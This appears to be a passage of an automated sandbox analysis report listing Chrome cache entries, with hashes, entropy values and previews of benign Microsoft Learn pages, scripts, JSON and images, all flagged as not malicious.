Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! ....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?\|..H+Dd.....Y%....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m

Chrome Cache Entry: 77

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1154
Entropy (8bit):	4.59126408969148
Encrypted:	false
SSDEEP:	24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
MD5:	37258A983459AE1C2E4F1E551665F388
SHA1:	603A4E9115E613CC827206CF792C62AEB606C941
SHA-256:	8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
SHA-512:	184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
Malicious:	false
Preview:	<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V

Chrome Cache Entry: 78

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
Category:	downloaded
Size (bytes):	47062
Entropy (8bit):	5.016149588804727
Encrypted:	false
SSDEEP:	768:haAq16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTKGLlO6eAbTIr4audZqBkZRLg
MD5:	1FF4CE3C1DB69A5146B03AD8BE62F5EB
SHA1:	5D177F6D11FCFF2BD62E61983383BB39D9F045E4
SHA-256:	222F320F99EF710DCE98F125314F30DAC99CF408525D86F185B317A878D48A5C
SHA-512:	36D198120D83AA9BDC2E74F80B99E2219EE4F03A8DD93A1E58A9E30BD48E829E5220A9F5FE6FC29B3810ED85005A8DCD0EAD04EE06DCCD0A15CD6D080E88641D
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=rwFNJ4pHWG.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Preview:	<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st

Chrome Cache Entry: 79

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3130
Entropy (8bit):	4.790069981348324
Encrypted:	false
SSDEEP:	48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
MD5:	EBA6E81304F2F555E1D2EA3126A18A41
SHA1:	61429C3FE837FD4DD68E7B26678F131F2E00070D
SHA-256:	F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
SHA-512:	3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
Malicious:	false
Preview:	{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/

Chrome Cache Entry: 80

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	15427
Entropy (8bit):	7.784472070227724
Encrypted:	false
SSDEEP:	384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
MD5:	3062488F9D119C0D79448BE06ED140D8
SHA1:	8A148951C894FC9E968D3E46589A2E978267650E
SHA-256:	C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
SHA-512:	00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
Malicious:	false
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0-....\|...X..s...Z.Y{....w..5.._s..x...E.......... ..................... ..................{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`......4..G.\|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...\|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....

Chrome Cache Entry: 81

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65410)
Category:	dropped
Size (bytes):	207935
Entropy (8bit):	5.420780972514107
Encrypted:	false
SSDEEP:	3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
MD5:	3DE400B2682E30C3F33FA4B93116491F
SHA1:	BC48B898DF43BA2178DE28F5A29D977B2204F846
SHA-256:	84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
SHA-512:	D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
Malicious:	false
Preview:	/!. 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e\|\|self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]\|\|{},d=(d=e)[l="oneDS"]=d[l]\|\|{},e=f[o]=f[o]\|\|{},p=e.v=e.v\|\|[],l=d[o]=d[o]\|\|{},g=l.v=l.v\|\|[];for(i in(l.o=l.o\|\|[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]\|\|(g[i]="---"),(u[r]=u[r]\|\|[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e\|\|t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]

Chrome Cache Entry: 82

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	27868
Entropy (8bit):	5.155680085584642
Encrypted:	false
SSDEEP:	768:63ZUfTvLg6jLjnjrjGjXMQjtzjMFzXY8v1gWj/rlOVqnACpK3o3hhl0OU2/8BlsX:BTvL7HBJv11pOVqlh382/rIN1Y
MD5:	0A0F2E1CCB8E5F7C38CB11B101A8941F
SHA1:	112F4B7CB3DEDB9D9744CAC000E05DC949E89891
SHA-256:	DBDB03D01BA044C4072BBC169C1E54D05A3D89623D2EBEAC28AC89ABDA3ABC2A
SHA-512:	9BD4E9C2415FB62E55D04DDEB9ECE04CB9AE2B8F8B93632A11A0AFD1CE6A632DF7D58DD571BF34C6E8E99107E80340CFAFF4BB4A8E18D05B5CAA7445DE55839C
Malicious:	false
Preview:	{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"

Chrome Cache Entry: 83

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65410)
Category:	downloaded
Size (bytes):	207935
Entropy (8bit):	5.420780972514107
Encrypted:	false
SSDEEP:	3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
MD5:	3DE400B2682E30C3F33FA4B93116491F
SHA1:	BC48B898DF43BA2178DE28F5A29D977B2204F846
SHA-256:	84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
SHA-512:	D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
Malicious:	false
URL:	https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
Preview:	/!. 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e\|\|self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]\|\|{},d=(d=e)[l="oneDS"]=d[l]\|\|{},e=f[o]=f[o]\|\|{},p=e.v=e.v\|\|[],l=d[o]=d[o]\|\|{},g=l.v=l.v\|\|[];for(i in(l.o=l.o\|\|[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]\|\|(g[i]="---"),(u[r]=u[r]\|\|[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e\|\|t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]

Chrome Cache Entry: 84

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	27868
Entropy (8bit):	5.155680085584642
Encrypted:	false
SSDEEP:	768:63ZUfTvLg6jLjnjrjGjXMQjtzjMFzXY8v1gWj/rlOVqnACpK3o3hhl0OU2/8BlsX:BTvL7HBJv11pOVqlh382/rIN1Y
MD5:	0A0F2E1CCB8E5F7C38CB11B101A8941F
SHA1:	112F4B7CB3DEDB9D9744CAC000E05DC949E89891
SHA-256:	DBDB03D01BA044C4072BBC169C1E54D05A3D89623D2EBEAC28AC89ABDA3ABC2A
SHA-512:	9BD4E9C2415FB62E55D04DDEB9ECE04CB9AE2B8F8B93632A11A0AFD1CE6A632DF7D58DD571BF34C6E8E99107E80340CFAFF4BB4A8E18D05B5CAA7445DE55839C
Malicious:	false
URL:	https://learn.microsoft.com/en-us/banners/index.json
Preview:	{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"

Chrome Cache Entry: 85

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	15427
Entropy (8bit):	7.784472070227724
Encrypted:	false
SSDEEP:	384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
MD5:	3062488F9D119C0D79448BE06ED140D8
SHA1:	8A148951C894FC9E968D3E46589A2E978267650E
SHA-256:	C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
SHA-512:	00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0-....\|...X..s...Z.Y{....w..5.._s..x...E.......... ..................... ..................{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`......4..G.\|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...\|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....

Chrome Cache Entry: 86

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	1432
Entropy (8bit):	4.986131881931089
Encrypted:	false
SSDEEP:	24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
MD5:	6B8763B76F400DC480450FD69072F215
SHA1:	6932907906AFCF8EAFA22154D8478106521BC9EE
SHA-256:	3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
SHA-512:	8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
Malicious:	false
URL:	https://learn.microsoft.com/static/assets/0.4.029026183/global/deprecation.js
Preview:	// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &

Chrome Cache Entry: 87

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	464328
Entropy (8bit):	5.0747157240281755
Encrypted:	false
SSDEEP:	6144:XegPrbKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:1KCerXyUh
MD5:	875E7F3672FEC41DDB5A2386D2331531
SHA1:	282979933E99BDE3A6342DC1EF93FBC51682F2C3
SHA-256:	F205B3CBA340ECB0B5D45E5DE6D385947CC4C21248707A90BFD5894E9B61F3C9
SHA-512:	67A3C1D8FF089E01C20962D96968DE43F3E8D49B474C396F08827EE891C0315693634E663D3148D7441B501EA6939A7D84A80B1E855B7C2A8BCB17E0013AFAD4
Malicious:	false
URL:	https://learn.microsoft.com/static/assets/0.4.029026183/styles/site-ltr.css
Preview:	.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0

Chrome Cache Entry: 88

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (52717), with no line terminators
Category:	dropped
Size (bytes):	52717
Entropy (8bit):	5.462668685745912
Encrypted:	false
SSDEEP:	1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
MD5:	413FCC759CC19821B61B6941808B29B5
SHA1:	1AD23B8A202043539C20681B1B3E9F3BC5D55133
SHA-256:	DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
SHA-512:	E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
Malicious:	false
Preview:	var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)\|\|Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)

Chrome Cache Entry: 89

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (52717), with no line terminators
Category:	downloaded
Size (bytes):	52717
Entropy (8bit):	5.462668685745912
Encrypted:	false
SSDEEP:	1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
MD5:	413FCC759CC19821B61B6941808B29B5
SHA1:	1AD23B8A202043539C20681B1B3E9F3BC5D55133
SHA-256:	DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
SHA-512:	E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
Malicious:	false
URL:	https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
Preview:	var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)\|\|Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)

Chrome Cache Entry: 90

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	exported SGML document, ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	1173007
Entropy (8bit):	5.503893944397598
Encrypted:	false
SSDEEP:	24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
MD5:	2E00D51C98DBB338E81054F240E1DEB2
SHA1:	D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
SHA-256:	300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
SHA-512:	B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
Malicious:	false
URL:	https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
Preview:	(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends\|\|(n=function(t,e){return n=Object.setPrototypeOf\|\|{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}\|\|function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign\|\|function(){return i=Object.assign\|\|function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read\|\|function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e\|\|e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally

Chrome Cache Entry: 91

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	16
Entropy (8bit):	3.875
Encrypted:	false
SSDEEP:	3:HMB:k
MD5:	0B04EA412F8FC88B51398B1CBF38110E
SHA1:	E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
SHA-256:	7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
SHA-512:	6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
Malicious:	false
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
Preview:	CgkKBw2/5iXyGgA=

Chrome Cache Entry: 92

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (46884)
Category:	dropped
Size (bytes):	1817143
Entropy (8bit):	5.501007973622959
Encrypted:	false
SSDEEP:	24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
MD5:	F57E274AE8E8889C7516D3E53E3EB026
SHA1:	F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
SHA-256:	2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
SHA-512:	9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
Malicious:	false
